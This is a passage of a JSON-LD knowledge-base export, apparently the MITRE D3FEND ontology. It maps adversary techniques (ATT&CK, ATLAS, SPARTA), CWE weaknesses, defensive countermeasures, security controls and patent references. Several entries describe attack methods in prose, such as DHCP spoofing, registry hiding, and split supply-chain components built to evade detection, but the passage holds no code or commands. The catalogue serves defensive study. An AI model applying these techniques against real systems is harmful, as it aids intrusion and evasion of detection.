      "@id": "d3f:T1112",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1112",
      "d3f:definition": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.",
      "d3f:modifies": {
        "@id": "d3f:WindowsRegistry"
      },
      "rdfs:label": "Modify Registry",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:N909dbb50d90d4b889254115686658a85"
        }
      ]
    },
    {
      "@id": "_:N909dbb50d90d4b889254115686658a85",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistry"
      }
    },
    {
      "@id": "d3f:M1035",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:NetworkIsolation"
      },
      "rdfs:label": "Limit Access to Resource Over Network"
    },
    {
      "@id": "d3f:CWE-1285",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1285",
      "d3f:definition": "The product receives input that is expected to specify an index, position, or offset into an indexable resource such as a buffer or file, but it does not validate or incorrectly validates that the specified index/position/offset has the required properties.",
      "rdfs:label": "Improper Validation of Specified Index, Position, or Offset in Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:Reference-SynchronizingAHoneyNetworkConfigurationToReflectATargetNetworkEnvironment_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170019425A1"
      },
      "d3f:kb-abstract": "Techniques for synchronizing a honey network configuration to reflect a target network environment are disclosed. In some embodiments, a system for synchronizing a honey network configuration to reflect a target network environment includes a device profile data store that includes a plurality of attributes of each of a plurality of devices in the target network environment; a virtual machine (VM) image library that includes one or more VM images; and a virtual clone manager executed on a processor that instantiates a virtual clone of one or more devices in the target enterprise network using a VM image selected from the VM image library that is customized based on one or more attributes for a target device in the device profile data store.",
      "d3f:kb-author": "Taylor Ettema, Huagang Xie",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:IntegratedHoneynet"
      },
      "d3f:kb-reference-title": "Synchronizing a honey network configuration to reflect a target network environment",
      "rdfs:label": "Reference - Synchronizing a honey network configuration to reflect a target network environment - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:CWE-343",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-343",
      "d3f:definition": "The product's random number generator produces a series of values which, when observed, can be used to infer a relatively small range of possibilities for the next value that could be generated.",
      "rdfs:label": "Predictable Value Range from Previous Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-340"
      }
    },
    {
      "@id": "d3f:AML.T0007",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0007",
      "d3f:definition": "Adversaries may search private sources to identify AI learning artifacts that exist on the system and gather information about them.\nThese artifacts can include the software stack used to train and deploy models, training and testing data management systems, container registries, software repositories, and model zoos.\n\nThis information can be used to identify targets for further collection, exfiltration, or disruption, and to tailor and improve attacks.",
      "rdfs:label": "Discover AI Artifacts - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0007"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Discover AI Artifacts"
    },
    {
      "@id": "d3f:NTFSLink",
      "@type": "owl:Class",
      "d3f:definition": "The NTFS filesystem defines various ways to link files, i.e. to make a file point to another file or its contents. The object being pointed to is called the target. There are three classes of NTFS links: (a) Hard links, which have files share the same MFT entry (inode), in the same filesystem; (b) Symbolic links, which record the path of another file that the link's contents should show and can accept relative paths; and (c) Junction points, which are similar to symlinks but defined only for directories and accept only local absolute paths.",
      "rdfs:label": "NTFS Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:FileSystemLink"
        }
      ]
    },
    {
      "@id": "d3f:WatchdogTimerServiceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which the watchdog timer is serviced (kicked/pet), extending the time until expiry.",
      "rdfs:label": "Watchdog Timer Service Event",
      "rdfs:subClassOf": {
        "@id": "d3f:WatchdogTimerEvent"
      }
    },
    {
      "@id": "d3f:CCI-000884_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization protects nonlocal maintenance sessions by employing organization-defined authenticators that are replay resistant.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:CredentialHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000884"
    },
    {
      "@id": "d3f:LinearLogicProgramming",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LLP",
      "d3f:definition": "Linear logic programming is a form of logic programming that uses linear logic, that is, it emphasizes the use of formulas as resources.",
      "d3f:kb-article": "## References\n1. Cosmo, R. and Miller D. (2019, May 24). _Linear logic_. Stanford Encyclopedia of Philosophy. [Link](https://plato.stanford.edu/entries/logic-linear/#LinLogComSci)\n2. Linear logic programming. (2023, May 16). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Logic_programming#Linear_logic_programming)",
      "rdfs:label": "Linear Logic Programming",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicProgramming"
      }
    },
    {
      "@id": "d3f:terminates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x terminates y: The technique x brings some activity y to an end or halt.",
      "d3f:synonym": "aborts",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00353480-v"
      },
      "rdfs:label": "terminates",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00354493-v"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:evicts"
        }
      ]
    },
    {
      "@id": "d3f:resumes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x resumes y: The agent or technique x continues a previous action on entity y. Usually occurs after suspension on y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00350758-v"
      },
      "rdfs:label": "resumes",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-298",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-298",
      "d3f:definition": "A certificate expiration is not validated or is incorrectly validated, so trust may be assigned to certificates that have been abandoned due to age.",
      "rdfs:label": "Improper Validation of Certificate Expiration",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-295"
        },
        {
          "@id": "d3f:CWE-672"
        }
      ]
    },
    {
      "@id": "d3f:CWE-467",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-467",
      "d3f:definition": "The code calls sizeof() on a pointer type, which can be an incorrect calculation if the programmer intended to determine the size of the data that is being pointed to.",
      "rdfs:label": "Use of sizeof() on a Pointer Type",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-131"
      }
    },
    {
      "@id": "d3f:DE-0012",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0012",
      "d3f:definition": "This technique involves two or more compromised components operating in coordination to conceal malicious activity. Threat actors compromise multiple software modules during the supply chain process and design them to behave cooperatively. Each component independently performs only a limited, seemingly benign function, such that when analyzed in isolation, no single module appears malicious. An example of implementation involves one component acting as a trigger agent, waiting for specific mission or system conditions (e.g., GPS fix, telemetry state) and writing a signal to a shared resource (e.g., file, bus). A separate action agent monitors this resource and only executes the malicious behavior (such as data exfiltration or command injection) upon receiving the trigger.\nThis division of responsibilities significantly undermines traditional detection techniques, such as log analysis, static code review, or heuristic-based behavior monitoring.",
      "rdfs:label": "Component Collusion - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0012/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTADefenseEvasionTechnique"
      },
      "skos:prefLabel": "Component Collusion"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_CM-5_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Restrictions for Change | Signed Components",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalAccountMonitoring"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "CM-5(3)"
    },
    {
      "@id": "d3f:CWE-94",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-94",
      "d3f:definition": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.",
      "d3f:may-be-weakness-of": [
        {
          "@id": "d3f:EvalFunction"
        },
        {
          "@id": "d3f:UserInputFunction"
        }
      ],
      "d3f:synonym": "Code Injection",
      "rdfs:label": "Improper Control of Generation of Code ('Code Injection')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-74"
        },
        {
          "@id": "d3f:CWE-913"
        },
        {
          "@id": "_:N975bac63a90e4033a444d1c3c284c8bf"
        },
        {
          "@id": "_:N00dbe4245f9c4ceeb60c2577f9d05b60"
        }
      ]
    },
    {
      "@id": "_:N975bac63a90e4033a444d1c3c284c8bf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-be-weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EvalFunction"
      }
    },
    {
      "@id": "_:N00dbe4245f9c4ceeb60c2577f9d05b60",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-be-weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:CCI-002422_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains the confidentiality and/or integrity of information during reception.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002422"
    },
    {
      "@id": "d3f:TimerSetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which a software timer is initialized with a specific duration or expiration time.",
      "rdfs:label": "Timer Set Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwareTimerEvent"
      }
    },
    {
      "@id": "d3f:Transformer-basedLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TBL",
      "d3f:definition": "A transformer is a deep learning model. It is distinguished by its adoption of self-attention, differentially weighting the significance of each part of the input (which includes the recursive output) data.",
      "d3f:kb-article": "## References\n\"Transformer (machine learning model).\" Wikipedia. [Link](https://en.wikipedia.org/wiki/Transformer_(machine_learning_model)).",
      "rdfs:label": "Transformer-based Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:CWE-407",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-407",
      "d3f:definition": "An algorithm in a product has an inefficient worst-case computational complexity that may be detrimental to system performance and can be triggered by an attacker, typically using crafted manipulations that ensure that the worst case is being reached.",
      "d3f:synonym": "Quadratic Complexity",
      "rdfs:label": "Inefficient Algorithmic Complexity",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:TA0010",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to steal data.\n\nExfiltration consists of techniques that adversaries may use to steal data from your network. Once they've collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.",
      "d3f:display-order": 11,
      "rdfs:label": "Exfiltration",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:OTRunCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Commands a device to start or resume a service/program.",
      "rdfs:label": "OT Run Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent"
        },
        {
          "@id": "_:Nd8e76e8fa23e401484d9d67665750910"
        },
        {
          "@id": "_:Nb1168d7cf1604c718f5aa00b3bfc2c5e"
        }
      ]
    },
    {
      "@id": "_:Nd8e76e8fa23e401484d9d67665750910",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:Nb1168d7cf1604c718f5aa00b3bfc2c5e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTRunCommand"
      }
    },
    {
      "@id": "d3f:IMP-0002",
      "@type": "owl:Class",
      "d3f:attack-id": "IMP-0002",
      "d3f:definition": "Measures designed to temporarily impair the use or access to a system for a period of time. Threat actors may seek to disrupt communications from the victim spacecraft to the ground controllers or other interested parties. By disrupting communications during critical times, there is the potential impact of data being lost or critical actions not being performed. This could cause the spacecraft's purpose to be put into jeopardy depending on what communications were lost during the disruption. This behavior is different than Denial as this attack can also attempt to modify the data and messages as they are passed as a way to disrupt communications.",
      "rdfs:label": "Disruption - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IMP-0002/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAImpactTechnique"
      },
      "skos:prefLabel": "Disruption"
    },
    {
      "@id": "d3f:Model-basedValueIteration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MBVI",
      "d3f:definition": "Value Iteration effectively reduces the evaluation stage down to a single sweep of the states. Additionally, to improve things further, it combines the Policy Evaluation and Policy Improvement stages into a single update.",
      "d3f:kb-article": "## References\nPolicy and Value Iteration. Towards Data Science.  [Link](https://towardsdatascience.com/policy-and-value-iteration-78501afb41d2).",
      "d3f:synonym": "MBVI",
      "rdfs:label": "Model-based Value Iteration",
      "rdfs:subClassOf": {
        "@id": "d3f:Model-basedReinforcementLearning"
      }
    },
    {
      "@id": "d3f:EX-0017",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0017",
      "d3f:definition": "The adversary inflicts damage by physically striking space assets or their supporting elements, producing irreversible effects that are generally visible to space situational awareness. Kinetic attacks in orbit are commonly grouped into direct-ascent engagements, launched from Earth to intercept a target on a specific pass, and co-orbital engagements, in which an on-orbit vehicle maneuvers to collide with or detonate near the target. Outcomes include structural breakup, loss of attitude control, sensor or antenna destruction, and wholesale mission termination; secondary effects include debris creation whose persistence depends on altitude and geometry. Because launches and on-orbit collisions are measurable, these actions tend to be more attributable and offer near–real-time confirmation of effect compared to non-kinetic methods.",
      "rdfs:label": "Kinetic Physical Attack - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0017/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Kinetic Physical Attack"
    },
    {
      "@id": "d3f:Reference-FirewallForProcessingConnection-orientedAndConnectionlessDatagramsOverAConnection-orientedNetwork_NationalSecurityAgency",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US6615358B1"
      },
      "d3f:kb-abstract": "The present invention is a device for and method of accessing an information network by initializing a database, an ATM approved list, an IP approved list, and an IP disapproved list; receiving a datagram; discarding the datagram if it is not on the ATM approved list; determining the datagram's type; allowing access to the network and comparing the connection request, if any, to the database if the datagram is ATM signaling; discarding the datagram if the datagram is ATM signaling and the database denies the request; adding the request to the ATM approved list if the datagram is ATM signaling and the database allows the request; allowing access to the network if the datagram is ATM data that excludes IP data and the request is on the ATM approved list; computing a flow tag if the datagram is ATM data that includes IP data; discarding the datagram if the flow tag is on the IP disapproved list; allowing access to the network if the flow tag is on the IP approved list; comparing the flow tag to the database if the flow tag is neither on the IP approved list nor on the IP disapproved list; discarding the datagram and adding the flow tag to the IP disapproved list if the database rejects the flow tag; and allowing access to the network and adding the flow tag to the corresponding approved list if the database accepts the flow tag; and performing these steps on the next datagram",
      "d3f:kb-author": "Patrick W. Dowd, John T. McHenry",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "National Security Agency",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "Firewall for processing connection-oriented and connectionless datagrams over a connection-oriented network",
      "rdfs:label": "Reference - Firewall for processing connection-oriented and connectionless datagrams over a connection-oriented network - National Security Agency"
    },
    {
      "@id": "d3f:may-have-weakness",
      "@type": "owl:ObjectProperty",
      "rdfs:domain": {
        "@id": "d3f:Artifact"
      },
      "rdfs:label": "may-have-weakness",
      "rdfs:range": {
        "@id": "d3f:Weakness"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:T1557.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1557.003",
      "d3f:creates": {
        "@id": "d3f:DHCPNetworkTraffic"
      },
      "d3f:definition": "Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).",
      "rdfs:label": "DHCP Spoofing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1557"
        },
        {
          "@id": "_:N502c1e6e60fa4182b9ec2554b54e780c"
        }
      ]
    },
    {
      "@id": "_:N502c1e6e60fa4182b9ec2554b54e780c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CredentialScrubbing",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CredentialScrubbing"
      ],
      "d3f:d3fend-id": "D3-CS",
      "d3f:definition": "The systematic removal of hard-coded credentials from source code to prevent accidental exposure and unauthorized access.",
      "d3f:hardens": {
        "@id": "d3f:Subroutine"
      },
      "d3f:kb-article": "## How it Works\nCredential Scrubbing involves identifying and eliminating hard-coded credentials such as usernames, passwords, API keys, and tokens from source code repositories. These credentials should be managed securely using environment variables, secret management tools, or secure vaults where they can be safely accessed when needed.\n\n## Considerations\n* Developers should conduct regular audits of source code to ensure credentials are not hard-coded.\n* Exposed credentials found in version control history must be disabled and replaced promptly.\n* Adopt role-based access controls and credential rotation policies to minimize security risks.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecretsManagementCheatSheet-OWASP"
      },
      "rdfs:label": "Credential Scrubbing",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:CWE-798"
        },
        {
          "@id": "https://capec.mitre.org/data/definitions/191.html"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SourceCodeHardening"
        },
        {
          "@id": "_:N9754c60e6ce44179b2d1dbdecf6bacb2"
        }
      ]
    },
    {
      "@id": "_:N9754c60e6ce44179b2d1dbdecf6bacb2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:CredentialHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CredentialHardening"
      ],
      "d3f:d3fend-id": "D3-CH",
      "d3f:definition": "Credential Hardening techniques modify system or network properties in order to protect system or network/domain credentials.",
      "d3f:enables": {
        "@id": "d3f:Harden"
      },
      "d3f:hardens": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Credential Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N15960fb5ec7f4d4fa7294f2a4fe98c41"
        },
        {
          "@id": "_:Nacc30899b2ef470989e85f94e6f35cab"
        }
      ]
    },
    {
      "@id": "_:N15960fb5ec7f4d4fa7294f2a4fe98c41",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Harden"
      }
    },
    {
      "@id": "_:Nacc30899b2ef470989e85f94e6f35cab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:operates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x operates y: The entity x enables, activates, or controls the functioning or behavior of object y (operated entity), typically in accordance with the design or intended use of the operated entity.",
      "rdfs:isDefinedBy": "oewn-01513459-v",
      "rdfs:label": "operates",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:AML.T0091.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0091.000",
      "d3f:definition": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS). They are commonly used for AI services such as chatbots, LLMs, and predictive inference APIs.",
      "rdfs:label": "Application Access Token - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0091.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0091"
      },
      "skos:prefLabel": "Application Access Token"
    },
    {
      "@id": "d3f:T1045",
      "@type": "owl:Class",
      "d3f:attack-id": "T1045",
      "d3f:definition": "Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1027.002",
      "rdfs:label": "Software Packing",
      "rdfs:seeAlso": {
        "@id": "d3f:T1027.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:ServiceBinaryVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ServiceBinaryVerification"
      ],
      "d3f:d3fend-id": "D3-SBV",
      "d3f:definition": "Analyzing changes in service binary files by comparing to a source of truth.",
      "d3f:kb-article": "## How it works\nSystem service applications may originate from the operating system installation or third-party applications installed with administrative privileges. These services have an entry point of some executable file-- a binary or a script. Attackers sometimes modify these executables to launch their own code. Analyzing changes in these files may uncover unauthorized activity.\n\n## Considerations\n* These files change for legitimate reasons when the system or software updates.\n* The source of truth must not be corrupted in order for this method to work.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ServiceBinaryModifications_MITRE"
      },
      "d3f:verifies": {
        "@id": "d3f:ServiceApplication"
      },
      "rdfs:label": "Service Binary Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemFileAnalysis"
        },
        {
          "@id": "_:N86a65ed3ab4c48b4a921c29e4cf8857d"
        }
      ]
    },
    {
      "@id": "_:N86a65ed3ab4c48b4a921c29e4cf8857d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:verifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:T1132.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1132.001",
      "d3f:definition": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.",
      "rdfs:label": "Standard Encoding",
      "rdfs:subClassOf": {
        "@id": "d3f:T1132"
      }
    },
    {
      "@id": "d3f:SymmetricFeature-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SFTL",
      "d3f:definition": "Homogeneous symmetric transformation takes both the source feature space Xs and target feature space Xt and learns feature transformations so as to project each onto a common subspace Xc for adaptation purposes. This derived subspace becomes a domain-invariant feature subspace to associate cross-domain data, and in effect, reduces marginal distribution differences.",
      "d3f:kb-article": "## References\nDay, O., & Khoshgoftaar, T.M. (2017). A survey on heterogeneous transfer learning. *Journal of Big Data, 4*(1), 29. [Link](https://doi.org/10.1186/s40537-017-0089-0).",
      "rdfs:label": "Symmetric Feature-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HomogenousTransferLearning"
      }
    },
    {
      "@id": "d3f:ContentExcision",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentExcision"
      ],
      "d3f:d3fend-id": "D3-CNE",
      "d3f:definition": "Removing specific, potentially malicious, parts of content",
      "d3f:kb-article": "## How it works\n\nIf malicious or unnecessary elements are discovered within the content, or if a specific embedded portion does not comply with policy, they may be removed to ensure safety.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc"
      },
      "rdfs:label": "Content Excision",
      "rdfs:subClassOf": {
        "@id": "d3f:ContentModification"
      }
    },
    {
      "@id": "d3f:Reference-DynamicSelectionAndGenerationOfAVirtualCloneForDetonationOfSuspiciousContentWithinAHoneyNetwork_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9882929B1/en?oq=US-9882929-B1"
      },
      "d3f:kb-abstract": "Techniques for dynamic selection and generation of detonation location of suspicious content with a honey network are disclosed. In some embodiments, a system for dynamic selection and generation of detonation location of suspicious content with a honey network includes a virtual machine (VM) instance manager that manages a plurality of virtual clones executed in an instrumented VM environment, in which the plurality of virtual clones executed in the instrumented VM environment correspond to the honey network that emulates a plurality of devices in an enterprise network; and an intelligent malware detonator that detonates a malware sample in at least one of the plurality of virtual clones executed in the instrumented VM environment.",
      "d3f:kb-author": "Taylor Ettema; Huagang Xie",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DecoyNetworkResource"
        },
        {
          "@id": "d3f:StandaloneHoneynet"
        }
      ],
      "d3f:kb-reference-title": "Dynamic selection and generation of a virtual clone for detonation of suspicious content within a honey network",
      "rdfs:label": "Reference - Dynamic selection and generation of a virtual clone for detonation of suspicious content within a honey network - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:may-be-detected-by",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may be detected by",
      "owl:inverseOf": {
        "@id": "d3f:may-detect"
      },
      "rdfs:label": "may-be-detected-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:attack-may-be-countered-by"
      }
    },
    {
      "@id": "d3f:quarantines",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x quarantines y: Technique x moves entity y to a place of isolation.",
      "rdfs:label": "quarantines",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-MicrosoftControlFlowGuard",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://learn.microsoft.com/en-us/windows/win32/secbp/control-flow-guard"
      },
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:ControlFlowIntegrity"
      },
      "d3f:kb-reference-title": "Control Flow Guard for platform security",
      "rdfs:label": "Reference - Control Flow Guard (CFG) - Microsoft"
    },
    {
      "@id": "d3f:Planning",
      "@type": "owl:Class",
      "rdfs:label": "Planning",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticalPurpose"
      }
    },
    {
      "@id": "d3f:AML.T0048.003",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0048.003",
      "d3f:definition": "User harms may encompass a variety of harm types including financial and reputational that are directed at or felt by individual victims of the attack rather than at the organization level.",
      "rdfs:label": "User Harm - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0048.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0048"
      },
      "skos:prefLabel": "User Harm"
    },
    {
      "@id": "d3f:CWE-1120",
